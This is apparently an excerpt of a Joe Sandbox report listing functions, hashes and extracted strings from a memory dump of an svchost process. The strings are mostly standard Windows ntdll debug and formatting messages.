Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816ea3f447afcd5de6a1eead59c5078550c43d8356162782cf0ba85b73678103
Instruction ID: bce978c43bf327ac4a78a9d8f06be3e961c393fd1c64ebbec8753293c373e851
Opcode Fuzzy Hash: 816ea3f447afcd5de6a1eead59c5078550c43d8356162782cf0ba85b73678103
Instruction Fuzzy Hash: FD90026160150452424071588844407A00697E13813D5C115A1554564C862889559269

Function 02F72AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d8066958ec5d33947a271faead141de5f22f97475ae26f06bc2b9b5b576a831
Instruction ID: 467f8326452664790409cb816fcc3f282507ba5bfbff0a768b7bfc9ca2dccff4
Opcode Fuzzy Hash: 6d8066958ec5d33947a271faead141de5f22f97475ae26f06bc2b9b5b576a831
Instruction Fuzzy Hash: ED900225221404120245B558464450B444697D63D13D5C015F2416594CC63189655321

Function 02F72AD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9febc0e69dcf3f76628fde6d5b3d017c86e2e3f18cf3a5c45ca8f69387639f
Instruction ID: 6330ff6fc068b81104099ac12376f7e5c912010efb42bd8268ee8a28821eb004
Opcode Fuzzy Hash: 0a9febc0e69dcf3f76628fde6d5b3d017c86e2e3f18cf3a5c45ca8f69387639f
Instruction Fuzzy Hash: 70900435311404130305F55C47445074047C7D53D13D5C031F3015554CD731CD715131

Function 02F72AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de562327d895bec0d0dce3c26709fd69112d5a2fc62a5e630954350255b37762
Instruction ID: e5dbecbaa40eff2e1261a3919e247344876bdd5e685eed897af17907ddacc7c2
Opcode Fuzzy Hash: de562327d895bec0d0dce3c26709fd69112d5a2fc62a5e630954350255b37762
Instruction Fuzzy Hash: 299002A1201544A24600B258C444B0B850687E0381B95C016E2054564CC53589519135

Function 02F72BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ffb3400f1ae9f5e9d499d8dafce0cdb41081b8570d6dbd76fe9f01e41d6e60a
Instruction ID: 293596ec0dc22d00f7082bb0d727e16972194c2a445f3c4e100740077e77aeb0
Opcode Fuzzy Hash: 7ffb3400f1ae9f5e9d499d8dafce0cdb41081b8570d6dbd76fe9f01e41d6e60a
Instruction Fuzzy Hash: 4F90023120140C12D2807158844464B400687D1381FD5C015A1025658DCA258B5977A1

Function 02F72BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a4d3fc9a901c2d679826113756a3f84807cafcdc2cc8b0d1bf7a7c05d9b9b9
Instruction ID: 950661c4d26de2a8321406531e552750b107b6f00885041f66e7480097c72602
Opcode Fuzzy Hash: b6a4d3fc9a901c2d679826113756a3f84807cafcdc2cc8b0d1bf7a7c05d9b9b9
Instruction Fuzzy Hash: 5990023120544C52D24071588444A47401687D0385F95C011A1064698D96358E55B661

Function 02F72BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec1e8f11550ce4e916c578dee65c38011d352d98998bd6a79d7dad14802f259f
Instruction ID: 83c7ecafb7dce67982fb0ee1e7418d246be938c37a19d5d2cdd919b3257ae217
Opcode Fuzzy Hash: ec1e8f11550ce4e916c578dee65c38011d352d98998bd6a79d7dad14802f259f
Instruction Fuzzy Hash: 4890023160540C12D25071588454747400687D0381F95C011A1024658D87658B5576A1

Function 02F72B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0fac7dfe72bd4b4ec669b6d74bc895802b8f2d42a783e8f23a9ef1a964fb9ca
Instruction ID: ddbfa930810c4575a41dc5ee30c7d5e8dd8716c4c4c55561ce8a5119354d5096
Opcode Fuzzy Hash: b0fac7dfe72bd4b4ec669b6d74bc895802b8f2d42a783e8f23a9ef1a964fb9ca
Instruction Fuzzy Hash: 7F90023120140C12D20471588844687400687D0381F95C011A7024659E967589917131

Function 02F739B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0dab24060af936d7f3611d291dc92ce989ccbddcba25208c05fb2c679ff98c
Instruction ID: 5267f6294e82b2be66da60b6db72b95d758cf5be2e075d8b945060a99c6e3bc8
Opcode Fuzzy Hash: 4e0dab24060af936d7f3611d291dc92ce989ccbddcba25208c05fb2c679ff98c
Instruction Fuzzy Hash: 5E90022124545512D250715C84446178006A7E0381F95C021A1814598D856589556221

Function 02F72EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9646e1f42911e763ed1df01795400eabe043cbedcea68684e5804eff51c4ca7b
Instruction ID: 9485ab621b22bc75d7be221186f8e99a4c2adafd883cbe42c255be7ec2acb2e2
Opcode Fuzzy Hash: 9646e1f42911e763ed1df01795400eabe043cbedcea68684e5804eff51c4ca7b
Instruction Fuzzy Hash: 0390026120180813D24075588844607400687D0382F95C011A3064559E8A398D516135

Function 02F72EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765523f206a148cda44ac0402bcb9ef5126093ad06c38084166f20672dff3c7c
Instruction ID: 4a2fdb19b0abd5115330e4c11f3fca362a0d4277f691ee9065d463fd37e2e52f
Opcode Fuzzy Hash: 765523f206a148cda44ac0402bcb9ef5126093ad06c38084166f20672dff3c7c
Instruction Fuzzy Hash: C190027120140812D24071588444747400687D0381F95C011A6064558E86698ED56665

Function 02F72E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ac7142098ad94cd09c79c106ec0e211a82ec0b5c4bba6e721acdedfd9bd470
Instruction ID: e6ec6445716d0cc5201552ac41459db3133a20f946cc127b3a0ba35b9e94a17f
Opcode Fuzzy Hash: 76ac7142098ad94cd09c79c106ec0e211a82ec0b5c4bba6e721acdedfd9bd470
Instruction Fuzzy Hash: 8990022160140912D20171588444617400B87D03C1FD5C022A2024559ECA358A92A131

Function 02F72E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6000688fdf554e5d47ca22c830234e1b8b70d763dc9c18963cadd576678e515d
Instruction ID: ae6a3a0342bbe6a14892aca1bddfda12de2212ed9c1e7eb86337fc29c2e709a1
Opcode Fuzzy Hash: 6000688fdf554e5d47ca22c830234e1b8b70d763dc9c18963cadd576678e515d
Instruction Fuzzy Hash: 5A90022130140812D20271588454607400AC7D13C5FD5C012E2424559D86358A53A132

Function 02F72FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d30de956833180121738e41d5a66d2e7f80e91669b0fb633c6a50877d20526a
Instruction ID: d150770c63ea00edeb6ac27b7e35b988931780506cd753a4a31df31912c84ef6
Opcode Fuzzy Hash: 1d30de956833180121738e41d5a66d2e7f80e91669b0fb633c6a50877d20526a
Instruction Fuzzy Hash: 3A900221211C0452D30075688C54B07400687D0383F95C115A1154558CC92589615521

Function 02F72FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4522a7cb054b2eb74488f4cb4419fba280ef8f6c39345cf440fb0e16bdf464db
Instruction ID: c664a66bc4b69a55de803b292a9c0a5b0e2ae98e39b5c5cc93bb64baa3aee922
Opcode Fuzzy Hash: 4522a7cb054b2eb74488f4cb4419fba280ef8f6c39345cf440fb0e16bdf464db
Instruction Fuzzy Hash: A99002216014045242407168C8849078006ABE1391795C121A1998554D856989655665

Function 02F72FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 592d573333434ff54c76b6feefb0622e5f30707c004abb97e4efbecf7d1580a8
Instruction ID: 014c8481ed9d033626ec0f60d6a9ab7ed1649671d115eb510b854b7c8ae88a4c
Opcode Fuzzy Hash: 592d573333434ff54c76b6feefb0622e5f30707c004abb97e4efbecf7d1580a8
Instruction Fuzzy Hash: 7D90023120180812D20071588848747400687D0382F95C011A6164559E8675C9916531

Function 02F72F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c737d04a150e156af8fe72b145790d6d380bb1889f0348186e9bdfe568fbe15b
Instruction ID: cf5164f095b21fd25ed4caca889ed82f760e53699432638f3744bb3c9263a8fb
Opcode Fuzzy Hash: c737d04a150e156af8fe72b145790d6d380bb1889f0348186e9bdfe568fbe15b
Instruction Fuzzy Hash: DB90023120180812D2007158885470B400687D0382F95C011A2164559D863589516571

Function 02F72F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346ae33dbc9595dde14f9b83299b85ce8b07e732047857de2dee8921c9a9c115
Instruction ID: ee48515411b593ef6910d2bbeb649bdc0809f6632f1f5f3afb3cd3a0da1f553f
Opcode Fuzzy Hash: 346ae33dbc9595dde14f9b83299b85ce8b07e732047857de2dee8921c9a9c115
Instruction Fuzzy Hash: 0C90026121140452D20471588444707404687E1381F95C012A3154558CC5398D615125

Function 02F72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ac7b521c68951d1d1b3d3569097dc821d336104472e8f5c7de928508f9c64f5
Instruction ID: be8d6f0e2397ba7acd55e19097630d1c657647c5d0f26eea035180a3c1308dc4
Opcode Fuzzy Hash: 7ac7b521c68951d1d1b3d3569097dc821d336104472e8f5c7de928508f9c64f5
Instruction Fuzzy Hash: 9F90026134140852D20071588454B074006C7E1381F95C015E2064558D8629CD526126

Function 02F72CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e3b2926733911ada972da393807bd88734629e85860e80f9e154d3eeca5bb7
Instruction ID: 489e3af334b05d113b09812c9eab8159772f0f4045c5431a5d09c21b8f0432ef
Opcode Fuzzy Hash: 78e3b2926733911ada972da393807bd88734629e85860e80f9e154d3eeca5bb7
Instruction Fuzzy Hash: BD90023120140813D20071589548707400687D0381F95D411A142455CDD66689516121

Function 02F72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a2a71024421de9bb6928e80584faf6209272573d9615bb5aa0d5093889a076
Instruction ID: c27a7fd2d6659dc1d47dba9644662f839c5e9972acc18fedec95d6da50498bcb
Opcode Fuzzy Hash: c4a2a71024421de9bb6928e80584faf6209272573d9615bb5aa0d5093889a076
Instruction Fuzzy Hash: 7790022160540812D24071589458707401687D0381F95D011A1024558DC6698B5566A1

Function 02F72CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35ddc65ff71134dc27f41b91ba72688ea3811831bb95fdf412e34763d5c6d942
Instruction ID: f8c55d04676976a4f8a0fe12c7c954296afe69670706be88980c272604cd766a
Opcode Fuzzy Hash: 35ddc65ff71134dc27f41b91ba72688ea3811831bb95fdf412e34763d5c6d942
Instruction Fuzzy Hash: 6F90023120140812D20075989448647400687E0381F95D011A6024559EC67589916131

Function 02F72C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3833d978aed9358b95aaebd5226c3b85ba58bd06e107e60b9ce7a27e5b60cda0
Instruction ID: 53e3dd2c38f45f97de1473147925b0259d80ce3fe2724691b16c318076f07c40
Opcode Fuzzy Hash: 3833d978aed9358b95aaebd5226c3b85ba58bd06e107e60b9ce7a27e5b60cda0
Instruction Fuzzy Hash: 6490023120148C12D2107158C44474B400687D0381F99C411A542465CD86A589917121

Function 02F72C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee85e8988b5a1fe9753ced154ce5d56cb6587237d10ee234fb84f89cc5dc65d2
Instruction ID: 3b1b2835c82cfeca7b1995633a10cb1b063eb0de561002f7d6f65da5571261ae
Opcode Fuzzy Hash: ee85e8988b5a1fe9753ced154ce5d56cb6587237d10ee234fb84f89cc5dc65d2
Instruction Fuzzy Hash: BC90023120140C52D20071588444B47400687E0381F95C016A1124658D8625C9517521

Function 02F72DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a95e4eee8834769e57df19572c56c3e5009e1df467389b471e5d9bf4fc00442
Instruction ID: 3b039ebd4e63f11507eb45e397870b9f0a44b633512dacdf8a380987a1ceb131
Opcode Fuzzy Hash: 6a95e4eee8834769e57df19572c56c3e5009e1df467389b471e5d9bf4fc00442
Instruction Fuzzy Hash: C3900221242445625645B1588444507800797E03C17D5C012A2414954C85369956D621

Function 02F72DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9acffa3b941d46fd34969325b3d6696316e4f75731f1f6db5bef05db088315b
Instruction ID: 7a9f2c784e4076fa2936c44fa67f3e9ab6f7e442748f3a1d2f0d24d790dd687f
Opcode Fuzzy Hash: d9acffa3b941d46fd34969325b3d6696316e4f75731f1f6db5bef05db088315b
Instruction Fuzzy Hash: B990023124140812D24171588444607400A97D03C1FD5C012A1424558E86658B56AA61

Function 02F73D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90f533c82626eb5923dedf542d29883ce5dd20343036100f635375c1b846d9b
Instruction ID: 8d2080def9deb3347d6915562e05402f249abde8a383b633fdd9508864394038
Opcode Fuzzy Hash: b90f533c82626eb5923dedf542d29883ce5dd20343036100f635375c1b846d9b
Instruction Fuzzy Hash: 6090023520140812D61071589844647404787D0381F95D411A142455CD866489A1A121

Function 02F72D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7e844dd12f2e80fa8743f51ac078f02b8bcce4c67bc363c1c7f2b74b334d66
Instruction ID: 5e801efa99b769e1f3e593a3a2848e1e5fd5eb25c5843d30e341e0d747908486
Opcode Fuzzy Hash: 8d7e844dd12f2e80fa8743f51ac078f02b8bcce4c67bc363c1c7f2b74b334d66
Instruction Fuzzy Hash: 1B90022130140413D240715894586078006D7E1381F95D011E1414558CD92589565222

Function 02F72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc53474ad0d7a706614ef9ea569595c38e226ef0b0bdc140c0fca83b17ad8e46
Instruction ID: 35b4c63025f7f4e4cedd62f7fc094acbb690ab4edf467d2c5c990896fa4aff3c
Opcode Fuzzy Hash: dc53474ad0d7a706614ef9ea569595c38e226ef0b0bdc140c0fca83b17ad8e46
Instruction Fuzzy Hash: 4B90022921340412D2807158944860B400687D1382FD5D415A101555CCC92589695321

Function 02F73D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 380f427573cc4afb4438fa162afb5f9491e28c676b5f3dcedaea93785d690bcc
Instruction ID: b828780c6310ce29f592235413ace4139a1f4d484d0d3d2e531a88afa4c6f673
Opcode Fuzzy Hash: 380f427573cc4afb4438fa162afb5f9491e28c676b5f3dcedaea93785d690bcc
Instruction Fuzzy Hash: 6190023120240552964072589844A4F810687E1382BD5D415A1015558CC92489615221

Function 02F72D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b239f7cfa362f3967171c4158bfd5561953d9d52e9e6226e5bb2472f87c6b700
Instruction ID: 6c803c10ddca198412d83853ab8b51d31305523223596316ed09e6af10420710
Opcode Fuzzy Hash: b239f7cfa362f3967171c4158bfd5561953d9d52e9e6226e5bb2472f87c6b700
Instruction Fuzzy Hash: 8D90022120544852D20075589448A07400687D0385F95D011A2064599DC6358951A131

Function 02F72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 65e5256bdf13a58bb659f25a7a57238f9c057c83d9dd8f62f93113ab387b9ee0
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 02F72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02F7293C
___swprintf_l.LIBCMT ref: 02F7295E
___swprintf_l.LIBCMT ref: 02F729A3
___swprintf_l.LIBCMT ref: 02FAA52E

Strings

::%hs%u.%u.%u.%u, xrefs: 02FAA527
:%u.%u.%u.%u, xrefs: 02FAA5B8
ffff:, xrefs: 02FAA504
::ffff:0:%u.%u.%u.%u, xrefs: 02FAA54E

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 389922a347fcda8d403d7502f4bf903b5e26e42a43d91d3d4f8c8943a005b1b1
Instruction ID: 9286b6efb93f2a3682e29574b405e1b32e647c43da7f7bb0eeb84047409b85b8
Opcode Fuzzy Hash: 389922a347fcda8d403d7502f4bf903b5e26e42a43d91d3d4f8c8943a005b1b1
Instruction Fuzzy Hash: 9151F9B6F00116BFDB10DB98CCA0A7EF7B8BB08280754816AEA95D7641D774DE44DBA0

Function 02F67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02FA4742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02FA4725
CLIENT(ntdll): Processing section info %ws..., xrefs: 02FA4787
Execute=1, xrefs: 02FA4713
ExecuteOptions, xrefs: 02FA46A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02FA4655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02FA46FC

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: f7c3ace46f104b553765f8d0b9e580fc61540b3eabf41e65eec2087fc834e4d8
Instruction ID: 83bf79866da9da761f5e5572c7927d80a2ea43609c6191eef2c90aa1a903ec4f
Opcode Fuzzy Hash: f7c3ace46f104b553765f8d0b9e580fc61540b3eabf41e65eec2087fc834e4d8
Instruction Fuzzy Hash: A9510B71A0021D6AEF11BA64DC59FFEB7B9EF04388F1401A9D705A7190D771AE45CF50

Function 02F7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02F7B6BF

Strings

0, xrefs: 02F7B695
-, xrefs: 02F7B650
+, xrefs: 02F7B65A
0, xrefs: 02F7B66F

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: cca5d9ad3feccc01f6c82c67f7f591ccae7c40041cd8b011036920584a3de485
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 5E81A670E0524D9EDF24CF68C891BFE7BB2AF4639CF18425BDA51A7290C7349942CB51

Function 02F5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 02FA031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02FA02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02FA02E7

Memory Dump Source

Source File: 00000001.00000002.1888759141.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2f00000_svchost.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: bbc892e5b967f27be236302a5b70c1f69520ef0bd79f46c0540dd6d2090e49c2
Instruction ID: 695597eaae085119a80ef5f6ff03d4185ad8666dd827d12e641e729a991f449b
Opcode Fuzzy Hash: bbc892e5b967f27be236302a5b70c1f69520ef0bd79f46c0540dd6d2090e49c2
Instruction Fuzzy Hash: 0EE1D071A087419FD724CF28D894B2AB7E1BF85394F140AADFB958B6D0DB74D844CB42

